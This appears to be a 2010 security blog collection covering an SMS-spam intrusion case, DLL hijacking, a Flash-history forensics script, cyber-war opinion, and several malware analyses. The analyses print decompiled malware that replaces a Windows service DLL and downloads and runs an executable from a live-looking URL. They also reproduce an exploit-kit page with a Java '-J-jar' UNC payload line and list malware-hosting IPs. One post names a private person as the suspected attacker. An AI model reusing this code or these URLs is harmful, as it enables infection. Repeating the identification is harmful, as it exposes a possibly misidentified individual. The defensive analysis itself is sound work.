cyberwart

Introduction

Beginning on approximately May 18th, 2010 we received an email complaint relating to abuse from an IP address belonging to a network that I monitor. Early on, the FBI was directly involved in the case, so it has been treated with high regard. The compromised IP address belongs to a subnet range used for VPN access available to limited users. The account was disabled per standard procedure, but abuse continued. Further investigation suggested the hacker was of Romanian origin and has been using the network to send text message oriented spam since at least May 2010. The hacker continued to abuse the network for an extended period despite having disabled at 10-15 accounts and blocking several network blocks.

The Case

This compromise set represents an interesting case study for several reasons. First, the attacker maintained persistent access for several months. This access continued despite a well trained defensive team and a relatively unsophisticated attacker. Second, despite being familiar with SPAM and even having received numerous unsolicited text messages I was relatively unaware of text message spam as business. This attacker was very regimented and deployed numerous text messaging spam techniques and I assume generated reasonable profits. Finally, we spent time investigating this attacker and resulted in pictures of the likely attacker or at least of someone who likely is closely associated with the attacker – despite this information and the involvement of the FBI the attacker is little threatened.

Initial Reporting

The initial indicator for this compromise set was an email from a website that provides text messaging services. We have concerns regarding the overall legitimacy of the business given their primary revenue model appears to be a referral network and sending mass text messages. However, the website owner contacted us because a stolen credit card was used in purchasing their services from an IP address belonging to a network that I monitor.

We initially determined the account was compromised and disabled the user. Unfortunately, the problem resurfaced.

Given that this was a second known incident and that the FBI was involved we decided to dig more into this compromise to ensure the problem was solved and that other instances of the same issue were not continuing undiscovered.

When we examined the logs we again saw that the two incidents were linked by IP address. Upon closer investigation we also discovered the hostname appeared to be the same.

As the incidents were almost certainly linked, we decided to continue our analysis to ensure the problem did not continue to resurface.

What we’re seeing

The attacker is primarily sending text message oriented spam (see next few screenshots).

The attacker is using numerous tools to send SPAM. The spam is generally related to Voice and Text messaging services. Email to SMS gateways are spammed. Likewise SIP, Skype, and Yahoo Voice also appear to be abused. We suspect the attacker generates profit by driving telephone calls or text messages as indicated in the SPAM. The attacker is very regimented; generally logging in week days around 3pm EST (approximately 10 pm in Bucharest and sending SPAM throughout the night.

Other Activity

In the next screenshot we see the attacker accessing a US based system via FTP. While it may be possible our attacker has legitimate reason to access to this system, it is probably safer to assume this system (69.147.83.173 – an ip owned by Yahoo) is being attacked as well. This likely significantly increases the legal exposure given that an organizational IP appears to likely be compromising or attempting to compromise a remote web server.

Who is doing this?

Next we attempt to identify the attacker by following the various logs and traffic history. We have already observed that all IP addresses appear to originate in Romania. But it is conceivable that the attacker is merely pivoting from another system or compromised account. But let’s start with the IP address:

Next we look at traffic originating from the compromised vpn account. We see an automated weather beacon query MSN weather for a Romanian area.

Next, we see the user using a Romanian Google portal with a browser set to use the Romanian Character set.

We also see Skype querying a Romanian variant. The combination of a Romanian IP address, Romanian Language settings, a Romanian weather beacon, Romanian Google, and Romanian Skype gives us high confidence that the attacker is in-fact Romanian.

We continue to closely monitor the situation. We disable numerous accounts but continue to observe compromised accounts by IP and by hostname. On July 11^th, the attacker makes a signifigant mistake by logging into facebook. As shown below this exposes both a facebook user ID and a yahoo email address.

Again seeing the hostname, the Romanian language settings, and the activity being in the right time frame, etc we are confident this is our attacker.

First using the email address we examine the Yahoo profile , which claims to be a 25 year old woman named Ana from Schenectady, New York.

Next we take the Facebook cookie and examined the facebook page to again find a user named Ana.

Logging into facebook we find that Ana is from Bacau, Romania.

A close up picture:

And she might be single….

As you can see from above, she appears to have clicked on a Match.com link.

Analysis of the Attacker

With a strong degree of confidence we believe the attacker is the Romanian woman. This is supported by the IP addresses of the attack, browser settings, weather beacons, and the Facebook page. We know the attacker logged in as the Facebook user “Ana Maria”. This fact does not necessarily indicate that the Facebook user is the attacker, but the attacker certainly had access to a system with the Facebook credentials for that user. That system is the same system using compromised user accounts and sending text spam for several months. Additionally the user is the Facebook profile is in the expected geographic area. Therefore it seems likely the Facebook user is the attacker or a close associate.

Mitigations to date

We made numerous efforts to block this user. We have performed the following remediation activities:

• Blocked SSL VPN connections from a specified IP range
• Created an ACL to block a specified IP range
• Disabled approximately 15 accounts
• Throttled login attempts on the SSL VPN

Despite these mitigations the attacker was able to maintain access using simple side-steps. She cycled through numerous accounts. When we blocked her IP address she switched to a different range. When we blocked that range, she used another VPN account to log into our VPN.

Summary

We have learned several lessons from this on-going case. Foremost is our inability to directly mitigate ongoing attacks. We are extremely limited in the mechanisms we can utilize to prevent determined attackers. This attacker did NOT use sophisticated tools or techniques but has successfully utilized our network despite our efforts to prevent unauthorized use for an extended period. We knew exactly what the attacker was doing, who she was, and had several additional strategies to block her. However, organizational difficulties slowed this process. A key lessoned learned is that we must develop internal communication processes with other groups to ensure that our detection and understanding of an attack can be translated into effective mitigations. Additionally, as someone who has spent serious time performing penetration tests and writing custom tools, I would have hoped to have fared better against this attacker given that I presume to know her business fairly well. Alas, defense is much harder.

There has been much written in regards to the wave of DLL binary hijacking and most of the analysis is very good. However, while trying to explain the vulnerability I’ve faced two questions over and over: One, why does this affect so many applications, and Two, how might these vulnerabilities be used.

In answer to one, the problems is library architecture problem. Some people have blamed Microsoft for the issue. In particular, I saw MS criticized for including the Current Working Directory (CWD) in the path. Honestly, I can’t imagine doing otherwise. I’m pretty sure most applications would fall apart if the CWD wasn’t included in the path. A few sanity checks would be nice, and this is essentially what MS’s new registry settings provide. But for me, the problem is that developers are loading libraries without knowing explicitly what they are. Sure this helps out when there are shared libraries, but ultimately you can’t secure an application if developers don’t check what they’re executing. As a development architecture problem across many applications there is now simple fix.

Digging into the problem, I demonstrate it with the following short program:

Microsoft explicitly advises against using SearchPath to help load a library, but developers seem to love doing things like this. If the user browses to a directory to open a media file, the CWD changes, and SearchPath looks there and happily returns a path to a planted malicious DLL.

Two, I haven’t seen these exploits in the wild. Exploit-DB is being overwhelmed with POCs but I haven’t seen realistic attack vectors actually used. With minimal testing here are a few cases that I’m worried about:

• A user unknowingly having a writable SMB share to the Internet with media files located on the share. An attacker writes an appropriate, and possibly hidden, DLL to the share. When a user later accesses the media files and is compromised.
• A user attempting to download a media file, such as a movie, from a malcious webserver. If the targeted media file is linked correctly via SMB or WebDAV and an appropriate DLL is also in the directory the user may be compromised.
• A user to be compromised by a typical client side vector – downloading a malicious PDF, JAR, or EXE. That malware then downloads various DLLs and hides them in every network share it can find and compromises any network user who opens the targeted files.

Numerous applications seem vulnerable such as uTorrent, DivX player, Skype, PowerPoint, etc and users love to click things. There’s a lot of hype with this old bug, but I expect things could get messy.

Mandiant released/updated their Web History tool recently. It’s a nice utility but it forgets about an important source of web history data – Flash “cookies”. By cookies I actually mean remnant files and directories related to caching Flash data. They don’t provide a plethora of data, but it’s a quick way to determine where users have used flash even after they clear their browser history.

Here’s a quick hack to dump visited websites from Flash cache files and the timestamps. This works in my exceptionally limited testing, but you should probably use something better than a POC for anything important:

#!/usr/bin/python
# mjw@cyberwart.com
# USAGE: dumpflashhistory.py
# eventually will add optional <-u username>
# NOTES: this is only a quick hack

import os, sys

def get_flashdirs():
    flash_dirs = []
    base_dir = os.getenv('USERPROFILE')
    flash_dirs.append(base_dir + "\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys")
    flash_dirs.append(base_dir + "\\Application Data\\Macromedia\\Flash Player\\#SharedObjects")

    return flash_dirs

def dedupe_sorted(arr):
    last = None
    ret = []
    for x in arr:
        if x != last:
            ret.append(x)
        last = x

    return ret

def get_flash_history(dirs):
    flash_files = []
    flash_dirs = []

    for d in dirs:
        for root, dirs, files in os.walk(d):
            for  dd in dirs:
                if dd.rfind('.', 4) > 0 and dd.find("\ ") < 0 and dd.rfind(".swf", 4) < 0:
                    #dd = dd.replace("#", '')
                    flash_dirs.append(dd + str(os.stat(str(os.path.join(root, dd)))[7:]))

    flash_dirs.sort()
    for x in dedupe_sorted(flash_dirs):
        print x

get_flash_history(get_flashdirs())

The cyber war debate is raging again. I assume this is because it’s summer and everyone is bored. There was a recent debate between Bruce Schneier and former NSA director Michael Hayden. Schneier argued that “Cyber war” has been grossly over hyped and the general argued that cyber war is a very real threat.

Next we have have Richard Bejtlich arguing that there is cyberwar here and here. He even goes on to argue the Chinese have “downed” F-22 fighters. His premise being that because some IP address in China being associated with an Internet compromise of a related defense contractor reported in April, the Chinese government has developed sufficient countermeasures to mitigate the prowess of the F-22 and thus it shouldn’t be purchased. Likewise not purchasing is apparently equivalent to destroying. He also claims to have special knowledge of the attack. I can only imaging that any special knowledge would be classified and that if he had the knowledge he couldn’t even reference it. Of course this is only speculation, but if one wants to debate an issue lets talk about verifiable evidence rather than unsubstantiated hyperbole.

Others including Sourcefire have jumped on the bandwagon, and Schneier posted a blog entry re-articulating his position.

My problem isn’t with Cyber War – it’s with the hyperbole. Every bit of evidence in the public space is consistent with run of the mill criminal activity. Aurora had links back to South Korea and Florida – as well as China. The infamous CRC code wasn’t uniquely Chinese. The F22 information compromise wouldn’t be considered war if a spy had grabbed papers physically – it would be classic espionage. Why would the medium suddenly change the nature of the event?

It’s easy say just call *this stuff* “cyber war”. I’m not being resistant to be pedantic. Rather, I think there’s a level of attack that could escalate well beyond the petty criminal or even espionage. Yes, the electric system is vulnerable. Yes it’s been speculated that hackers caused a sewage spill (I believe in Australia IIRC). I think these items begin to broach the warfare threshold. For instance, if a computer attack exploited a power system blew up a generator and caused a cascading power failure – the destructive impact might be similar to a cruise missile destroying the same target (though that is a wild guess). There would be possible loss of life and massive economic damage. But things could still get worse, imagine if enemy combatants could take control of a Predator and attack US troops; or if they could switch blue (friendly) and red (enemy) forces inside a blue force tracking system. Going crazy with speculative FUD I could even speculate that a determined attacker at a nation state level could hack a common autopilot system and cause it to engage and rapidly decent on landing – the result being horrific and definitely war like. Because these attacks are conceivable it’s important to maintain a reasonable threshold for “cyber war”. If not we will lack even the basic language to prepare to appropriately defend ourselves.

Again, the above is merely speculative FUD, but it has been my experience that all software is breakable given sufficient time and expertise. Rather than contractors stealing billions from the government in non-sensical products and services that make us no safer  or the NSA eroding our privacy, we should have serious discussions. Computers control huge aspects of life and could be leveraged to serious damage. But “cyber war” as currently described only lessens the conversation. The scary thing is that serious professionals are calling this stuff “war”, they say we’re losing (we are), but they think these low level attacks are nation states.

For instance, say I have a military force that needs to be trained. They’re to support the war on crime in south east DC. South east can be  a very violent place, there’s lots of crime, lots of armed men, and a high homicide rate. If I train them for “Crime war” they will likely be very adapt at that mission. However, if they’re destined fight a “war war” they will likely be entirely unprepared to face (say) the Chinese Army. You can imagine what might happen in those circumstances. I think the same is likely to be the case if we prepare defenses for cyber war by confusing it with cyber crime. Instead of addressing the real threats of cyber war everyone is running around shouting cyber war over weak criminal attacks trying to get sell an inappropriate service or tool.

I hate the AV industry. Symantec does a fairly good write up, but they block out the attacking system. This is completely absurd. Every admin needs to know where the payload is going to. Symantec apparently feels you have to be important or pay for the info. Fuck Symantec. Here’s the main from one of the samples:


int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
HANDLE v5; // eax@8
HRSRC v6; // esi@10
DWORD v7; // ebp@10
HANDLE v8; // esi@10
const void *v9; // eax@10
HRSRC v10; // esi@10
DWORD v11; // edi@10
HGLOBAL v12; // ebx@10
HANDLE v13; // esi@10
const void *v14; // eax@10
DWORD NumberOfBytesWritten; // [sp+8h] [bp-C68h]@10
HGLOBAL hResData; // [sp+Ch] [bp-C64h]@10
const CHAR ServiceName[4]; // [sp+10h] [bp-C60h]@1
char v18; // [sp+15h] [bp-C5Bh]@1
__int16 v19; // [sp+10Dh] [bp-B63h]@1
char v20; // [sp+10Fh] [bp-B61h]@1
CHAR Buffer; // [sp+110h] [bp-B60h]@1
const CHAR v22[260]; // [sp+214h] [bp-A5Ch]@2
const CHAR ExistingFileName; // [sp+318h] [bp-958h]@3
const CHAR MultiByteStr; // [sp+41Ch] [bp-854h]@2
const CHAR v25; // [sp+520h] [bp-750h]@4
char v26; // [sp+560h] [bp-710h]@4
char v27; // [sp+561h] [bp-70Fh]@4
__int16 v28; // [sp+61Dh] [bp-653h]@4
char v29; // [sp+61Fh] [bp-651h]@4
char v30; // [sp+620h] [bp-650h]@2
const CHAR v31[260]; // [sp+724h] [bp-54Ch]@2
const CHAR CmdLine; // [sp+828h] [bp-448h]@5
struct _WIN32_FIND_DATAA FindFileData; // [sp+928h] [bp-348h]@4
const CHAR FileName; // [sp+A68h] [bp-208h]@3
char NewFileName; // [sp+B6Ch] [bp-104h]@2

strcpy((char *)ServiceName, "BITS");
memset(&v18, 0, 0xF8u);
v19 = 0;
v20 = 0;
if ( !GetSystemDirectoryA(&Buffer, 0x104u)
|| (sprintf(&NewFileName, "%s\\dllcache\\qmgr.dll", &Buffer),
sprintf((char *)&MultiByteStr, "%s\\qmgr.dll", &Buffer),
sprintf((char *)v22, "%s\\kernel64.dll", &Buffer),
sprintf((char *)v31, "%s\\es.ini", &Buffer),
!GetWindowsDirectoryA(&v30, 0x104u)) )
return -1;
sprintf((char *)&ExistingFileName, "%s\\EventSystem.dll", &v30);
sprintf((char *)&FileName, "%s\\ServicePackFiles\\i386\\qmgr.dll", &v30);
if ( CheckIfLocalAccountIsAdmin() )
{
v5 = FindFirstFileA(&ExistingFileName, &FindFileData);
if ( v5 != (HANDLE)-1 )
{
FindClose(v5);
return -1;
}
NumberOfBytesWritten = 0;
v6 = FindResourceA(0, (LPCSTR)0x65, "SERV_DLL");
v7 = SizeofResource(0, v6);
hResData = LoadResource(0, v6);
v8 = CreateFileA(&ExistingFileName, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);
v9 = LockResource(hResData);
WriteFile(v8, v9, v7, &NumberOfBytesWritten, 0);
CloseHandle(v8);
v10 = FindResourceA(0, (LPCSTR)0x66, "SERV_INI");
v11 = SizeofResource(0, v10);
v12 = LoadResource(0, v10);
v13 = CreateFileA(v31, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);
v14 = LockResource(v12);
WriteFile(v13, v14, v11, &NumberOfBytesWritten, 0);
CloseHandle(v13);
if ( ManipulateBITSService(ServiceName, 4u) == -1
|| (StopBITS(ServiceName),
Sleep(1u),
DisableWindowsFileProtection(&MultiByteStr),
Sleep(1u),
ReplaceOriginalQMGR_DLLwithEventSystem_DLL(
&NewFileName,
(int)v22,
(int)&MultiByteStr,
&ExistingFileName,
&FileName) == -1)
|| (SetFakeQMGRToOriginalQMGRFiletime((int)&ExistingFileName, v22),
SetFakeQMGRToOriginalQMGRFiletime((int)&MultiByteStr, v22),
SetFakeQMGRToOriginalQMGRFiletime((int)v31, v22),
ManipulateBITSService(ServiceName, 2u) == -1)
|| StartBITS(ServiceName) == -1 )
return -1;
}
else
{
CoInitialize(0);
memcpy((void *)&v25, "hXXp://210.211.31.214/img/xslu.exe", 0x40u);
v26 = aHttp210_211_31[64];
memset(&v27, 0, 0xBCu);
v28 = 0;
v29 = 0;
if ( !GetEnvironmentVariableA("TEMP", (LPSTR)&FindFileData, 0x100u)
|| (sprintf((char *)&CmdLine, "%s\\1yxf.exe", &FindFileData),
DeleteUrlCacheEntry(&v25),
URLDownloadToFileA(0, &v25, &CmdLine, 0, 0))
|| WinExec(&CmdLine, 0) <= 0x1F )
return -1;
}
return 0;
}

In case you missed it
hxxp://210.211.31.214/img/xslu.exe

Just a heads up on some IPs we’re seeing hosting malware:

[5/10/10 12:29:31 PM] mjw: 68.168.216.6 is malware
[5/10/10 12:29:41 PM] mjw: 82.211.7.32 malware
[5/10/10 12:29:46 PM] mjw: 83.169.37.246 malware
[5/10/10 12:30:06 PM] mjw: 91.203.133.223 malware
[5/10/10 12:30:18 PM] mjw: petwife.ru malware
[5/10/10 12:31:02 PM] mjw: 78.41.156.236 malware
[5/10/10 12:31:12 PM] mjw: 87.110.220.31 malware
[5/10/10 12:31:16 PM] mjw: prealpole.ru malware
[5/10/10 12:32:04 PM] mjw: 88.191.79.223 malware
[5/10/10 12:32:13 PM] mjw: 188.72.211.253 malware
[5/10/10 12:32:18 PM] mjw: wovenshelf.ru malware

Contents like:

HTTP/1.1 200 OK{D}{A}

Server: nginx{D}{A}

Date: Wed, 05 May 2010 04:00:01 GMT{D}{A}

Content-Type: text/html{D}{A}

Connection: close{D}{A}

Expires: 0{D}{A}

Pragma: no-cache{D}{A}

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0{D}{A}

Cache-Control: private{D}{A}

Content-Length: 1270{D}{A}

{D}{A}

< html > < head > < title > Bob’s Homepage < /title > < /head > < body > < applet width='100%' height='100%' code='JavaFX' archive='Games.jar

' > < param name='site' VALUE='Njg3NDc0NzAzQTJGMkY3MzcwNjU2QzZDNkM2RjYxNjQyRTcyNzUyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzR

DMxMzEyNjcwNjk2NDNEMzIyNjYyMzA=' > < /applet > < applet code='quote.GReader.class' archive='NewGames.jar' width='215' height='1

54' > < param name='data' VALUE='hxxp://spellload.ru/welcome.php?id=9&pid=2&1=1' > < param name='cc' value='1' > < /applet > < script

> {A}

var u = “hxxp: -J-jar -J\\\\70.86.147.162\\public\\002.jar none”;{A}

I like facebook. I was a student when Facebook was first developed. “Back in the day” many universities, including mine, gave freshmen a “face book”. Basically it was a picture book with all the incoming freshmen and their names. It was a mechanism to help you meet people. Facebook.com was the very savvy digital evolution of that concept. As a geek the useful digital evolution of paper product was very cool to me. Since then it has greatly expanded and evolved to fit a different purpose. One of it’s best utilities is catching up with old friends. I’ll greatly miss this use. Unfortunately, big business has mutated a lovely utility into a shameful invasion of privacy.

I was just surfing CNN and noticed I was logged into CNN via facebook. I was logged into facebook, but I can’t recall ever giving CNN the okay to access my facebook information. Additionally, there’s a Visual Studio 2010 ad – which I’m guessing is targeted. This implies that facebook is tracking the sites I visit and collaborating/conspiring with marketers to track my internet usage to better market products and make money. Alas, this is just too far for me. I’m going to say goodbye to facebook in the near future and would advise others to do the same.

We’re seeing the Java exploit used in the wild. It’s being hosted at: 92.52.88.240, 94.23.110.101, and 93.89.80.117 with the payload being delivered http: -J-jar -J\\\\85.9.22.19\\public\\0923.jar and http: -J-jar -J\\\\174.37.45.153\\public\\0923.jar

Sorry no time for a proper write up.

Richard Bejtlich posted an analysis of the current flight problems in Europe caused by the volcanic eruption. The article he cites is here.  In the post, Richard rather broadly dismisses models in favor of “measurement”. I was a bit struck by this – especially given my focus as an undergrad on mathematical modeling.

You can’t understand the flight problem without a model. Yes you need data, but every mathematical model uses data. The purpose of this type of model is to estimate how an event affects the system – doing so in a mathematical valid manner that can be tested and the model itself evaluated with existing data. Therefore, I’d argue there’s no innate problem between a model and measurement/data. Models are heavy data consumers. They ingest the data attempt to correlate it together and then extrapolate future conditions. The easiest way for someone unfamiliar with modeling is to think back to the hurricane season. Based on a tremendous amount of data, models are used to predict the likely path of hurricanes, their predicted winds, their speed, and amount of flooding. The models are far from perfect, but generally they’re pretty good – and the best we can do.

http://www.foreignaffairs.com/articles/66186/john-mueller-and-mark-g-stewart/hardly-existential?page=show

Sara Laughlin

Matthew Wollenweber

{belevume, mwollenw}@gwu.edu

Summary

On April 14, 2010 we detected an unknown executable being downloaded from a suspicious website. After investigating the matter we determined that 95.168.185.155 (also abantont.com) was hosting the malicious file summ.exe (MD5 = c42f4a697f096c99f8c9ece028083449). The page uses obfucscated javascript to load a java control which then downloads a java jar, which then downloads and executes summ.exe. The payload calls back to 76.76.103.219 (amostagorawe.com). The site buckomre.com (217.20.121.31) is also involved with the attack.

Analysis

We detected the malware via a standard IDS executable signature as follows:

The website in question hosted no real content only highly obfuscated javascript as given below:

Attempting to study the malware in Malzilla was unfruitful given the high dependence on the DOM. Therefore we began manual deobfuscation:

The javascript decodes the initial blob of text into an unknown bit of code. It appears almost like raw binary javascript. However, we are not experts on Javascript. Our observation indicates that v1[v2](contentN) is this.neovarlag(payload). Examining contentN as a string we see:

There appears to be text fragments in there including what appears to say “application/java-”. Indeed if we let this execute we see a bit of Java loads.

We next use Firebug to debug this further and discover the Java comes from \\abantont.com\50035\CO.php (though the connection is over HTTP). Visiting the page we get a Jar file which we decompress and then decompile the Class files with Jad. We see:

We’ve now found our mystery EXE downloaded from hxxp://abantont.com/50035/54098876 and then executed. The payload has an MD5 c42f4a697f096c99f8c9ece028083449. Dynamic analysis was performed with Anubis and ThreatExpert. The payload changes various registries to insure it remains persistent. It attempts to disable the Windows Firewall and AV. It appears to visit fake AV oriented sites. It then visits the command and control page: hxxp://amostagorawe.com/1025065312. Manual reversing was not performed on the executable.

Anyone have an old pcap for Storm (aka Waledac)? A friend wants/needs a pcap with the bot talking to the C&C.

Please leave a msg or email me mjw@cyberwart.com

A recent DailyDave post Dave Aitel writes:

<snip>

Anyways, if you’re sitting in a room with some hackers, you can always
do this: Ask them (as a group) if they could get kicked out of any
network they spent six months undetected in.

All hackers say “no” of course (what’s a hacker without an ego?) but
it’s interesting to see the facial expressions while they come to that
conclusion. With the right kind of eyes you can see the black wings
unfolding behind them as they think about it.
</snip>

I think the above is normal bait to dive into a hot topic – in this case Advanced Persistent Threat (APT). A lot of people have been writing about APT recently. Some posts are strictly marketing FUD. Others are thoughtful. The security community seems to have mixed feelings on the topic. I believe this stems from the fact that marketing FUD is mixed in with thoughtful analysis by some serious dudes. Then there’s also some crazy stammering about why cyber war FUD is scarier than APT analysis. It all makes a thoughtful discussion difficult.

Since everyone is writing on the topic and it’s a slow night, I’m up for a little rambling. First, as a penetration tester I’ve been on live networks, attacking remotely, been “caught”, and still maintained access to the network. Not too long ago I had a nice 9 month stretch where I got to do several “black” external pen tests with realistic rules of engagement. These engagements were executed with limited company knowledge – generally only known by CIO/CISO and up and allowed a lot of creativity. When we were detected (usually planned to measure the IR response) we’d see the incident response happen but it didn’t matter for several reasons including:

1. We used multiple VPN and shell accounts to get random dynamic IP addresses. The IDS teams couldn’t block everything.
2. We varied our attack payload and callbacks. I generally configure about 1/3 of my attacks to be different and slow. The machines callback between 24-48 hours later.
3. Callbacks went to websites and traffic is generally valid HTML.
4. The dropper callbacks are different than C&C.
5. The payloads aren’t detected by any AV at the time of attack.
6. If you utilize email to communicate defense against the attack – I’m probably reading.
7. Domain Admins love to remote into compromised Windows machines to figure out what’s going on.
8. After I crack a few passwords using your VPN is lovely.

I’m not sure of a technical description of APT, but I think maintaining covert access to critical systems and accounts through an active incident response qualifies.

Does all this mean defense is useless? No, definitely not. All the above is fairly labor intensive and not profitable in most criminal activities. The criminals, for the most part, are running SPAM like schemes. They push fake antivirus, fake traffic for pay-per-click/sales-referrals, or sending SPAM. I can’t provide solid metrics on the previous assertion, but in my experience it appears to be true. Further, criminal attacks need to achieve criminal profit so they have to monetize their activities, and the above seem to be the easiest and most common methods. To achieve these objectives, they want to own a lot of different boxes drive a few clicks, try to make a fake AV or porn purchase, and send email until it’s fixed. In that business model it simply doesn’t make sense to work hard to maintain access. Additionally, if you’re dropping your toolkit on thousands of hosts it’s going to get expensive and complicated to avoid getting builds purged by AV updates. Therefore, I think for most organizations worrying about APT doesn’t make sense in a risk management analysis as the expected threat model.

The cynical out there, myself included, will mention that protecting your particular organization against generalized attack trends hardly ensures security. I can’t argue at all with that sentiment. However, most organizations have tremendous difficulty defending their networks from phishing attacks to download AV, porn, porn players, and porn codecs. Throw in the monthly Adobe Reader exploit being spammed out to 10,000 employees and many organizations struggle. Zeus is another great counter example. As a huge botnet targeting financial information it’s proof that not all crimeware is as described above. But for every info stealing bot I see I, I discover 10+ as described above.

What about everyone else – those past the easiest low hanging fruit? I still argue not to worry. All the reasons are implied in Dave’s post. First, he assumes the hacker is going to get in the network. Second the hackers will answer they’re not going to get booted out. I think these are sound assumptions and follow from how read I “hacker”. In this context I think it means “a professional paid to compromise and maintain access to corporate networks”. From there I think the true nature of the problem is apparent – ie you’re worrying that if you’re attacked by a “hacker” you’re going to get owned and APT is going to be a nightmare. You will. These types of people do what they do because they can defeat most security teams. It’s what they do. Still, don’t worry. This further boils down to this (silly) analogy:

If you’re a corporate executive walking down the street – not in a bad neighborhood and not causing problems, with a couple bodyguards (your security team), and a team of ninja (hackers) try to rob and kill you they probably will. But how many dudes are attacked by a team of ninjas?

Speaking of ninjas, did you guys hear about the Hamas official assassinated in Dubai? It was like a team of ninjas…

Today an in-house tool I’ve been developing (Dragonslayer) triggered on events matching both a PDF signature and traffic to hosts on the MalwareDomainList. In particular it was hitting on ip 79.171.22.190 which is hosted as kokojamba.com.

The host is registered as follows:

Domain Whois record

Queried whois.internic.net with “dom kokojamba.com”…

Domain name: kokojamba.com

Status: Active

Registrant:

Name: Andrzej Ignashevitch

Address: Pulawska, 15

City: Warszawa

Province/state: poland

Country: PL

Postal Code: PL-02515

Administrative Contact:

Name: Andrzej Ignashevitch

Organization: Andrzej Ignashevitch

Address: Pulawska, 15

City: Warszawa

Province/state: poland

Country: PL

Postal Code: PL-02515

Phone: +48.713965232

Fax: +48.713965232

Email: magikmind13@gmail.com

Technical Contact:

Name: Andrzej Ignashevitch

Organization: Andrzej Ignashevitch

Address: Pulawska, 15

City: Warszawa

Province/state: poland

Country: PL

Postal Code: PL-02515

Nameserver Information:

ns1.kokojamba.com

ns2.kokojamba.com

Create: 2010-03-04 20:05:36

Update: 2010-03-04

The admin panel had the default user/password of “admin”:”admin”.

Here’s what’s on the inside:

I wrote a quick python script to download all the compromised host data. It’s available here: http://www.cyberwart.com/files/koko.txt.gz I’m not sure if each IP is compromised or only downloaded a (one or more payloads). It doesn’t appear that simply visiting the site gets you one the list. Also, the files downloaded feature seems broken as I’ve seen payloads delivered but not showing up on the list.

So a hot blond decided to randomly add me on Facebook. I know what you’re thinking: “Matt with your dashing good looks, charm, and terrific fashion sense, I’m sure you have models contacting you all the time”. I won’t argue with your logic, but in my boredom I decided to investigate a little. Here’s what I found:

If you think this isn’t normal there’s a job req up on fling: